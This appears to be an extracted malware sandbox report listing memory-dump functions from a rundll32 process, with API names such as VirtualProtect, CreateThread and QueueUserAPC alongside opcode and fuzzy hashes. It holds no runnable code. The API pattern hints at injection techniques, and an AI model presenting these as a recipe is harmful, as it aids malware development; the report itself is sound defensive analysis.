                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Control-flow graph (rendered graph not recoverable from extraction): function basic blocks 195d8ab6a94-195d8ab6ca3; API calls inside the graph: lstrcmp
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmp
                                                          • String ID:
                                                          • API String ID: 1534048567-3916222277
                                                          • Opcode ID: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction ID: b9691e66209deb9b7cb4a9b3772b9cb4dc1574fd72681434476f70a882ae6ba5
                                                          • Opcode Fuzzy Hash: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction Fuzzy Hash: D5513B71618E084BF729AE5C9C962B977D2F789321F18013DDACED3291D925AC4287C3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
                                                          • Instruction ID: d94d53b680c711cd5f5bbb921d895740fe4e0af7e790d316ef91f0f37da55ff6
                                                          • Opcode Fuzzy Hash: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
                                                          • Instruction Fuzzy Hash: 0061B070218F098FE744EF69D8997A5B7E1FB58310F14456EE54ED32A1DB34E880CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction ID: f438cbbaa44e9b6d20671c884f3268468f3c04fc47c7205b85319845ffa94f51
                                                          • Opcode Fuzzy Hash: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction Fuzzy Hash: 34510C30608E068FF765EF6894643BA77F3EB58361F14413E954AD32A1DF78E5028B02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateOpen
                                                          • String ID:
                                                          • API String ID: 436179556-0
                                                          • Opcode ID: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction ID: 5f2bd6ab8f4cf11aa73587af21d1b08b4113e04547d541083f448d0a364f86be
                                                          • Opcode Fuzzy Hash: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction Fuzzy Hash: 10110830608B058FEB55EB4C949476AB7E1EBAC315F14002EE98DD33A0DA74C8418743
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Control-flow graph (rendered graph not recoverable from extraction): function basic blocks 195d8ab1cc4-195d8ab1d4d; API calls inside the graph: CreateThread, QueueUserAPC
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction ID: 852fa8c9c592e43edc34fc1dd4780356d7ba4d3fd89da23c746ec3f02360370d
                                                          • Opcode Fuzzy Hash: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction Fuzzy Hash: 80012D30714A094FEBA4EF6DA84D63977F2F798351B24457AA409C3270DE78DC428B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
                                                          • Instruction ID: 44399eb08dddb732434bfa146f0cd1874452d2de2b3602fa952a492b077bd7de
                                                          • Opcode Fuzzy Hash: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
                                                          • Instruction Fuzzy Hash: 0E619270518E098FF795EF68D499AA573E1FB68311F14451EE94EC3251EB70EC41CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
• Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd (Joe Sandbox IDA Plugin)
Similarity
• API ID: BoundaryDeleteDescriptor
• String ID:
• API String ID: 3203483114-0
• Opcode ID: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
• Instruction ID: 0e24acec0b2195606470922ac1fec5d2032f0c8c4a6da09941c3c8d01f682bbc
• Opcode Fuzzy Hash: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
• Instruction Fuzzy Hash: E041B530618E5C8FFB95DF98D894AE573E2F759320F58412AE10EC32A6DA64DC46C782
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Part of subcall function 00000195D8AC374C: RegCreateKeyA.ADVAPI32(?,?,?,00000195D8ADDCD3), ref: 00000195D8AC376F
• RegQueryValueExA.KERNELBASE ref: 00000195D8ADE508
Memory Dump Source
• Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
• Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd (Joe Sandbox IDA Plugin)
Similarity
• API ID: CreateQueryValue
• String ID:
• API String ID: 2711935003-0
• Opcode ID: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
• Instruction ID: e60157321071814d761b89183ecf161278e6f300de28c4113fb2ef36dbf2c84a
• Opcode Fuzzy Hash: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
• Instruction Fuzzy Hash: 14212170618B488FF781EF68D458B9AB7E1FB98354F400929A48AD3351EB78D940CB43
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
• Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd (Joe Sandbox IDA Plugin)
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
• Instruction ID: bfcf69a9451a9a7dbffb3ff7e9751946d9a9eb2405b6cb5cef588099c9ce1e31
• Opcode Fuzzy Hash: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
• Instruction Fuzzy Hash: 5111AF3060CB088FEB48EF59A845565B7E5FB98310B04462DE98EC7345FE70E9058B87
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
• Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd (Joe Sandbox IDA Plugin)
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
• Instruction ID: 989fa9c7cb64ad2e96c1c5402ec702e1349b96b9aafee29b500eb4b76a0d139a
• Opcode Fuzzy Hash: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
• Instruction Fuzzy Hash: CCF04F31318F454BFB98DF69D498B6AB2E2EBD8312F48162DB54AC3250DB78E8454742
Uniqueness
• Uniqueness Score: -1.00%

Non-executed Functions